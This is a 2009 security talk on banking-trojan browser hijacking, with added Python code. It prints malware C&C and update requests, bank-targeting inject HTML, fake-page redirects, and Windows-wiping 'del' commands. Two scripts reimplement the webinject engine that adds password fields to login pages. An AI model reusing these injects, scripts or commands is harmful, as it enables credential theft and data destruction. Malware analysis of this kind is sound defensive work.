Common Browser Hijacking Methods

3,351 views

Published on

Presentación realizada en el evento de Terena de mayo de 2009

Published in: Technology

1. Common Browser Hijacking Methods
David Barroso
TERENA Meeting, León

2. Agenda
• Browser Hijacking
• Examples: SilentBanker, Sinowal, Wnspoem
• Kill the Operating System
• Summary

3. Browser Hijacking

4. Definition
"Browser hijacking is the modification of a web browser's settings by malicious code. The term 'hijacking' is used as the changes are performed without the user's permission" (Wikipedia).
Additionally, the malicious code can rewrite the HTML rendered by the browser in order to deceive the user, for example by adding fields that ask for more credentials than the real page does.

5. Why are they asking for so much data? [screenshot]

6. Examples

7. SilentBanker
• Date: 2007
• Method: Browser Helper Object (BHO)
• Technique: real-time HTML injection and HTTP forwarding
• Infection: drive-by exploits
• Misc: more than 75 mutations

8. SilentBanker: Flow Diagram [figure]

9. SilentBanker: BHO Installation
The BHO is registered as an ordinary COM in-process server and then listed under Internet Explorer's Browser Helper Objects key, so IE loads the DLL into every browser process:

  [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
  @="Microsoft Shared Library Object Version"

  [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
  @="C:\\WINDOWS\\system32\\mfc42dx1.dll"
  "ThreadingModel"="Apartment"

  [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
  @="SharedObject.SharedObjectVersion.1"

  [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\TypeLib]
  @="{5F226421-415D-408D-9A09-0DCD94E25B48}"

  [HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\VersionIndependentProgID]
  @="SharedObject.SharedObjectVersion"

  [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
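
The registration above is exactly what to look for when triaging a box for a suspected BHO. The Python script below is an added example, not code from the presentation: it parses a .reg export covering HKCR\CLSID and the Browser Helper Objects key, lists each registered BHO with the in-process DLL it maps to, and flags DLLs that live under the Windows directory. That last heuristic is an assumption of the example (vendor BHOs normally install under Program Files); a real check would also verify the DLL's Authenticode signature. The sample export is constructed from the slide's entries plus a hypothetical legitimate toolbar.

```python
import re

# Constructed sample: the SilentBanker entries from the slide written out as the .reg
# export Windows produces (backslashes doubled inside quoted data), plus a hypothetical
# legitimate toolbar so the triage has something to compare against.
SAMPLE_REG = r'''
[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}]
@="Microsoft Shared Library Object Version"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\InprocServer32]
@="C:\\WINDOWS\\system32\\mfc42dx1.dll"
"ThreadingModel"="Apartment"

[HKEY_CLASSES_ROOT\CLSID\{0000AC13-3487-1583-C4BE-BE6A839DB000}\ProgID]
@="SharedObject.SharedObjectVersion.1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0000AC13-3487-1583-C4BE-BE6A839DB000}]

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}]
@="Hypothetical Vendor Toolbar"

[HKEY_CLASSES_ROOT\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32]
@="C:\\Program Files\\Vendor\\toolbar.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-2222-3333-4444-555555555555}]
'''

BHO_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def parse_reg(text):
    """Parse .reg text into {key path (lower-cased): {value name: data}}; '@' is
    the default value. Only quoted string data is unescaped, which is all a BHO
    registration uses."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = VALUE_LINE.match(line)
        if m and current is not None:
            name = "@" if m.group(1) == "@" else m.group(1)[1:-1]
            data = m.group(2)
            if len(data) >= 2 and data[0] == data[-1] == '"':
                data = data[1:-1].replace('\\\\', '\\').replace('\\"', '"')
            keys[current][name] = data
    return keys


def list_bhos(text):
    """One (CLSID, display name, in-process DLL) tuple per BHO registered for IE."""
    keys = parse_reg(text)
    prefix = BHO_KEY.lower() + "\\"
    bhos = []
    for key in keys:
        if not key.startswith(prefix):
            continue
        clsid = key[len(prefix):].split("\\")[0]
        clsid_key = r"hkey_classes_root\clsid" + "\\" + clsid
        name = keys.get(clsid_key, {}).get("@", "")
        dll = keys.get(clsid_key + r"\inprocserver32", {}).get("@", "")
        bhos.append((clsid.upper(), name, dll))
    return bhos


def flag_suspicious(bhos):
    """Triage heuristic (an assumption of this example, not a rule from the slides):
    vendor BHOs normally live under Program Files, so a DLL dropped into the
    Windows directory, like SilentBanker's mfc42dx1.dll, deserves a closer look.
    A real check would also verify the DLL's Authenticode signature."""
    return [b for b in bhos if b[2].lower().startswith("c:\\windows\\")]


if __name__ == "__main__":
    for clsid, name, dll in list_bhos(SAMPLE_REG):
        print(clsid, name, dll)
    print("suspicious:", flag_suspicious(list_bhos(SAMPLE_REG)))
```

On a live machine the same walk can be done with `reg export` of the two keys and then this parser, which keeps the analysis off the infected host's own (possibly hooked) APIs.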

10. SilentBanker: Configuration File
The bot fetches its configuration with a GET that carries its identifier (C&C addresses are redacted on the slide):
  GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442

11. SilentBanker: Configuration File
The encrypted configuration file includes:
• Additional configuration sources
• Dropsite URL
• Update URL
• Data encryption key

  [dfgdf]                                        (additional configuration sources)
  Bg1=X.Y.67.30/~ipcount/ww6/getcfg.php
  Bg2=A.B.100.103/ww6/getcfg.php
  [nbmx]                                         (dropsite URL)
  Bg1=X.Y.67.30/~ipcount/ww6/data.php
  Bg2=A.B.100.103/ww6/data.php
  [kjew]                                         (update URL)
  Bg1=X.Y.67.30/~ipcount/ww6/file.exe
  Bg2=A.B.100.103/ww6/file.exe
  [sdfs]                                         (data encryption key)
  secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585…

12. SilentBanker: Injection Configuration
The injection rules are fetched with the same request, with c=20:
  GET X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442

Fields of one injection entry (the key names are obfuscated, the meanings are not):
• pok: action
• qas: target URL
• njd: begin replacement token (hex-encoded)
• dfr: number of characters in njd, minus 1
• xzn: end replacement token (hex-encoded)
• xzq: number of characters in xzn, minus 1
• rek: HTML code to inject (hex-encoded)
• req: number of characters in rek, minus 1

Actions:
• insert: insert the injected HTML code between the tokens
• delete: delete the HTML code in xzn
• replace: replace the HTML code in xzn
• subreq: substitute xzn with rek
• grab: extract the field in xzn

Example entry:
  [jhw18]
  pok=insert
  qas=passport.yandex.ru/passport
  njd=3ECFE0F0EEEBFC3A3C28
  dfr=9
  xzn=3C2367653E69
  xzq=5
  rek=202020203C676520696E797674612122676263223E0D0A20202020…
  req=331

13. SilentBanker: Injection Configuration
The injected HTML (rek, hex-decoded) is stored ROT-13 encoded:

  <ge inyvta!"gbc">
    <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq>
    <gq jvqgu!"%+1" pynff!"ynory">Платежный пароль:<#gq>
    <gq jvqgu!")$1" pynff!"vachg"> <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1" gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq>
    <gq jvqgu!"&)1"><oe><#gq>
  <#ge>

ROT-13 decoded:

  <tr valign="top">
    <td width="8%"><div style="width: 40px;"><br /></div></td>
    <td width="17%" class="label">Платежный пароль:</td>
    <td width="50%" class="input"> <input type="password" name="passwd2" value="" style="width:50%" tabindex="2">&nbsp;&nbsp;<br/> </td>
    <td width="25%"><br></td>
  </tr>

The injected row adds a second password field, labelled "Платежный пароль:" ("payment password"), to the Yandex passport login form; the (Cyrillic, cp1251) label itself is not ROT-13 encoded.
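
To make the field semantics concrete, the following Python example (added here, not code from the presentation) encodes and decodes entries in the layout slides 12 and 13 describe: hex-encoded tokens and HTML, a "length minus one" counter for each, and ROT-13 over the injected HTML. It then applies the insert and grab actions to a constructed login page. Assumptions of the example: only rek is ROT-13 encoded and only letters are rotated (the slide's sample also alters some punctuation, which the slide does not document); grab is read as "return what lies between the two tokens"; delete, replace and subreq are listed on slide 12 without a precise description of their span, so they are not implemented here. The section names, URL and page are made up.

```python
import codecs

# Key names are obfuscated in the real file; the meanings are the ones slide 12 gives.
FIELD_MEANING = {
    "pok": "action (insert / delete / replace / subreq / grab)",
    "qas": "target URL",
    "njd": "begin token, hex-encoded",
    "dfr": "length of njd minus one",
    "xzn": "end token, hex-encoded",
    "xzq": "length of xzn minus one",
    "rek": "injected HTML, hex-encoded and ROT-13",
    "req": "length of rek minus one",
}


def parse_config(text):
    """Split the '[section]' / 'key=value' layout into {section: {key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line[0] == "[" and line[-1] == "]":
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


def hex_field(entry, name, counter):
    """Hex-decode one field and check its 'length minus one' counter; a mismatch
    means a truncated or tampered entry and is refused rather than applied."""
    data = bytes.fromhex(entry[name])
    if int(entry[counter]) != len(data) - 1:
        raise ValueError(f"{name}: counter {entry[counter]} != {len(data) - 1}")
    return data.decode("latin-1")


def decode_entry(entry):
    """Turn one raw section into a usable rule. Assumption: only rek is ROT-13
    encoded, and only letters are rotated (ROT-13 is its own inverse)."""
    return {
        "action": entry["pok"],
        "url": entry["qas"],
        "begin": hex_field(entry, "njd", "dfr"),
        "end": hex_field(entry, "xzn", "xzq"),
        "html": codecs.encode(hex_field(entry, "rek", "req"), "rot_13"),
    }


def encode_entry(section, action, url, begin, end, html):
    """Inverse transform; used only to build the constructed sample below."""
    def hx(s):
        return s.encode("latin-1").hex().upper()
    return "\n".join([
        f"[{section}]", f"pok={action}", f"qas={url}",
        f"njd={hx(begin)}", f"dfr={len(begin) - 1}",
        f"xzn={hx(end)}", f"xzq={len(end) - 1}",
        f"rek={hx(codecs.encode(html, 'rot_13'))}", f"req={len(html) - 1}",
    ])


def apply_entry(page, rule):
    """Apply a decoded rule to a page as the BHO would while IE renders it.
    Returns (page, grabbed): 'insert' splices the HTML between the two tokens,
    'grab' leaves the page alone and returns what sits between them."""
    start = page.find(rule["begin"])
    if start < 0:
        return page, None
    body_start = start + len(rule["begin"])
    body_end = page.find(rule["end"], body_start)
    if body_end < 0:
        return page, None
    if rule["action"] == "insert":
        return page[:body_start] + rule["html"] + page[body_start:], None
    if rule["action"] == "grab":
        return page, page[body_start:body_end]
    raise ValueError(f"action {rule['action']!r} not implemented in this example")


# Constructed sample: a bank-style login form and two rules, one injecting a second
# password field after the real one (as on slides 13-15), one grabbing the login field.
SAMPLE_PAGE = (
    '<form action="/login">'
    '<tr><td>Login:</td><td><input name="login"></td></tr>'
    '<tr><td>Password:</td><td><input type="password" name="passwd"></td></tr>'
    '<tr><td><input type="submit"></td></tr>'
    '</form>'
)
INJECTED_ROW = '<tr><td>Transfer password:</td><td><input type="password" name="passwd2"></td></tr>'
SAMPLE_CONFIG = "\n".join([
    encode_entry("jhw18", "insert", "bank.example/login",
                 'name="passwd"></td></tr>', '<tr><td><input type="submit">', INJECTED_ROW),
    encode_entry("jhw19", "grab", "bank.example/login",
                 "<td>Login:</td><td>", "</td>", ""),
])


def run_sample():
    """Decode the constructed config and apply both rules to the sample page."""
    rules = {name: decode_entry(e) for name, e in parse_config(SAMPLE_CONFIG).items()}
    injected, _ = apply_entry(SAMPLE_PAGE, rules["jhw18"])
    _, grabbed = apply_entry(SAMPLE_PAGE, rules["jhw19"])
    return injected, grabbed


if __name__ == "__main__":
    injected, grabbed = run_sample()
    print(injected)
    print("grabbed:", grabbed)
```

The counter check matters in practice: the real configs are downloaded over plain HTTP from a C&C that may be sinkholed or half-dead, and an entry whose counter disagrees with its payload is better refused than spliced into a page.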

14. SilentBanker: Original Webpage [screenshot]

15. SilentBanker: Modified Webpage [screenshot]

16. Sinowal/Anserin/Torpig
• Date: 2005
• Method: code injection
• Technique: real-time HTML injection and HTTP forwarding
• Infection: drive-by exploits and email
• Misc: infects the Master Boot Record (MBR) to stay stealthy

17. Sinowal: Injection
Sinowal does not carry a configuration file describing all its injections. Each time the user connects to one of the targeted sites, Sinowal asks its injection server for instructions.

18. Sinowal: Injection Example
  GET host/Key/EncryptedData
  GET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1

The slide's callouts: the request as a whole says "tell me the fake page path", the key says "I want the answer encrypted", and the encrypted data identifies the targeted brand.

19. Sinowal: Injection Example
Step 3: the injection server looks up the targeted brand:
  UK   online*.lloydstsb.*            /miheld.ibc                     {www} /uk/lloyds/lloyds.php                 2 0 4
  USA  onlineid.bankofamerica.com     /cgi-bin/sso.login.controller*  {www} /usa/bofa_pers/sso.login.php          2 0 3
  ES   www*.bancopopular.es           /Bpemotor                       {www} /spain/bancopopular/bancopopular.php  2 0 2

20. Sinowal: Injection Example
Step 4: the injection server answers:
  www*.bancopopular.es /Bpemotor /spain/bancopopular/bancopopular.php 2 0 5 1

The slide's callouts: www*.bancopopular.es /Bpemotor is the real URL; /spain/bancopopular/bancopopular.php is the fake page path; the trailing numbers are annotated as 2: a GET of the real URL is needed to enable it, 0: number of visits, 5: number of injection attempts, 1: injection.

21. Sinowal: Targeted URLs
HTTP forwarding (web injects), targeted URLs per country:
• PL: 7
• AU: 26
• UK: 40
• SK: 5
• DE: 47
• NZ: 8
• US: 65
• NL: 4
• ES: 30
• SG: 2
• IT: 18
• AT: 7
• TR: 44

22. Wnspoem/PRG/ZeuS/Ntos
• Date: 2006
• Method: code injection
• Technique: real-time HTML injection and HTTP forwarding
• Infection: drive-by exploits

                 Version 1    Version 2       Version 3    Version 4
  Directory      wnspoem      sysproc64       twain_32     lowsec
  Filename       ntos.exe     oembios.exe     twext.exe    sdra64.exe
  Stolen data    audio.dll    sysproc86.sys   local.ds     local.ds
  Configuration  video.dll    sysproc32.sys   user.ds      user.ds

23. Wnspoem: Famous Screenshots [screenshots]

24. Wnspoem: Flow Diagram [figure]

25. Wnspoem: Hooks
Wsock32.dll (FTP/POP3 capture):
• send
• sendto
• closesocket
Ws2_32.dll (FTP/POP3 capture):
• send
• sendto
• WSASend
• WSASendTo
• closesocket
User32.dll (keylogger):
• GetMessage
• PeekMessage
• GetClipboardData
Wininet.dll (capture data, inject HTML):
• HttpSendRequest
• InternetReadFile
• InternetReadFileEx
• InternetQueryDataAvailable
• InternetCloseHandle
• HttpQueryInfo
Ntdll.dll (infect processes and hide files):
• NtCreateThread
• LdrLoadDll
• LdrGetProcedureAddress
• NtQueryDirectoryFile
Crypt32.dll (certificates):
• PFXImportCertStore

26. Wnspoem: Configuration File
Configuration files in the latest wnspoem version are encrypted with RC4 using 256-bit keys. A decrypted injection rule looks like this (the flags GP select which requests the rule applies to):

  set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
  data_before
  name="password"*</td>*</td>
  data_end
  data_inject
  <td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src=/img4bog/px.gif border=0 width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
  data_end
  data_after
  data_end

The injected HTML adds a third row to the login form, "3. Clave de Transferencias" (transfer password), right after the real password field.

27. Wnspoem: Original Webpage [screenshot]

28. Wnspoem: Modified Webpage [screenshot]

29. Wnspoem: HTTP Forwarding
Some banks use security tokens or a stronger second authentication factor than a password. In that scenario HTML injection is not used; instead the user is forwarded to a fake webpage, usually hosted on a compromised site.

30. Wnspoem: HTTP Forwarding
In the configuration file (each entry: match mask, original URL mask, fake page):
  @https://*.barclays.co.uk/*
  https://*.barclays.co.uk/*
  http://compromisedhost.com/img/commons/barclay/index.php
  @https://*.cajasur.es/*
  https://*.cajasur.es/*
  http://compromisedhost.com/img/commons/cajasur/index.php
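
The following Python example is added here (it is not code from the presentation or from the trojan) to show how the webinject block on slide 26 and the forwarding entries on slide 30 are consumed by the code sitting behind the Wininet hooks: the set_url mask is matched against the request URL, the data_before/data_after patterns (with * as the only wildcard) locate the injection point in the response body, and the data_inject HTML is spliced in; a forwarding entry that matches instead yields the fake page. The bank page is a constructed stand-in. Assumptions of the example: the @ lines are read as three whitespace-separated fields (match mask, original URL mask, fake URL), G and P are taken to mean GET and POST requests, and a non-empty data_after is taken to mean that everything between the two markers is replaced by the injected HTML.

```python
import re

# Constructed samples: the rule from slide 26 with its line layout restored, and the
# two forwarding entries from slide 30 read as three whitespace-separated fields.
WEBINJECTS = '''set_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GP
data_before
name="password"*</td>*</td>
data_end
data_inject
<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src=/img4bog/px.gif border=0 width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>
data_end
data_after
data_end
'''

FORWARDS = '''@https://*.barclays.co.uk/* https://*.barclays.co.uk/* http://compromisedhost.com/img/commons/barclay/index.php
@https://*.cajasur.es/* https://*.cajasur.es/* http://compromisedhost.com/img/commons/cajasur/index.php
'''


def mask_to_regex(mask, anchored=True):
    """'*' is the only wildcard in these masks; everything else is literal."""
    body = ".*?".join(re.escape(part) for part in mask.split("*"))
    return re.compile("^" + body + "$" if anchored else body, re.S)


def parse_webinjects(text):
    """Parse set_url blocks: URL mask, flags, and the before/inject/after sections."""
    rules, rule, section, buf = [], None, None, []
    for line in text.splitlines():
        if line.startswith("set_url "):
            parts = line.split()
            rule = {"mask": parts[1], "url": mask_to_regex(parts[1]),
                    "flags": parts[2] if len(parts) > 2 else "",
                    "before": "", "inject": "", "after": ""}
            rules.append(rule)
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[len("data_"):], []
        elif line == "data_end" and section is not None:
            rule[section] = "\n".join(buf)
            section = None
        elif section is not None:
            buf.append(line)
    return rules


def apply_webinjects(url, method, html, rules):
    """Rewrite a response body the way the hooked InternetReadFile would: for each
    rule whose mask matches the URL and whose flags cover the method (assumption:
    G = GET, P = POST), the inject HTML goes right after the data_before match;
    if data_after is set, everything up to its match is replaced (assumption)."""
    for rule in rules:
        if not rule["url"].match(url) or method[:1].upper() not in rule["flags"]:
            continue
        m = mask_to_regex(rule["before"], anchored=False).search(html)
        if not m:
            continue
        start = end = m.end()
        if rule["after"]:
            m2 = mask_to_regex(rule["after"], anchored=False).search(html, start)
            if not m2:
                continue
            end = m2.start()
        html = html[:start] + rule["inject"] + html[end:]
    return html


def parse_forwards(text):
    """'@<match mask> <original URL mask> <fake URL>' per line (assumed layout)."""
    rules = []
    for line in text.splitlines():
        if line.startswith("@"):
            match_mask, _original_mask, fake = line[1:].split()
            rules.append((mask_to_regex(match_mask), fake))
    return rules


def forward_target(url, rules):
    """HTTP forwarding: a matching URL is answered with the fake page instead."""
    for pattern, fake in rules:
        if pattern.match(url):
            return fake
    return None


# Constructed stand-in for the bank's login table (not the real page).
SAMPLE_HTML = (
    '<table>'
    '<tr><td class="textoHome" align="left">1. Usuario</td><td width="20"></td>'
    '<td align="left"><input name="user" maxlength="20"></td><td width="20"></td></tr>'
    '<tr><td class="textoHome" align="left">2. Clave de Acceso</td><td width="20"></td>'
    '<td align="left"><input type="password" name="password" maxlength="8"></td><td width="20"></td></tr>'
    '<tr><td colspan="7"><input type="submit" value="Entrar"></td></tr>'
    '</table>'
)


def demo(url="https://www.gruposantander.es/bog/sbi1?ptns=acceso&x=1"):
    """Run one request through forwarding first, then injection, as the bot does."""
    fake = forward_target(url, parse_forwards(FORWARDS))
    if fake:
        return ("forward", fake)
    return ("inject", apply_webinjects(url, "GET", SAMPLE_HTML, parse_webinjects(WEBINJECTS)))


if __name__ == "__main__":
    print(demo())
    print(demo("https://ibank.barclays.co.uk/olb/auth/LoginLink.action"))
```

Because the rewrite happens inside the browser process after TLS has been stripped by Wininet, neither the padlock nor the certificate tells the user anything: the injected row is indistinguishable from the bank's own markup, which is why the screenshots on slides 27 and 28 look alike.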

31. Wnspoem: Fake Webpage [screenshot]

32. Wnspoem: Statistics
Analysis and statistics of configuration files: 750 configuration files (usually cfg.bin) analyzed; only wnspoem versions 1, 2 and 3.

33. Wnspoem: Top 10 TLD [chart]

34. Wnspoem: Targeted Brands [chart]

35. Wnspoem: Malicious Domains [chart]

36. Wnspoem: Malicious IP Addresses [chart]

37. Kill the Operating System

38. Kill the Operating System
It is becoming more common that, right after the credentials have been stolen, the operating system is remotely destroyed. This makes analysis harder, since it can no longer be done remotely. The malicious code is not securely deleted from the system, though, and can still be recovered from the disk. One optimistic outcome is that the machine gets reformatted with a new and patched operating system.

39. Kill the Operating System
Nethell:
• Deletes NTDETECT.COM and ntldr
InfoStealer:
• Deletes drivers\*.sys
• Deletes some registry keys (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon: Shell = Explorer.exe)
Wnspoem:
• Deletes HKCU, HKLM\Software and HKLM\System
Glacial Dracon:
• del /A:S /Q /F C:\*.*
• del /S /Q %SYSTEMROOT% %PROGRAMFILES%

40. Summary

41. Summary
• Browser hijacking is actively used in fraud schemes
• Targeted brands are all around the world
• Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox)
• Be suspicious if your browser is asking for too much information
• Be even more suspicious if your computer stops working just after your browser asked for too much information ☺

42. Thanks
David Barroso
S21sec e-crime Director
dbarroso@s21sec.com
http://blog.s21sec.com
lostinsecurity

43. Thank you very much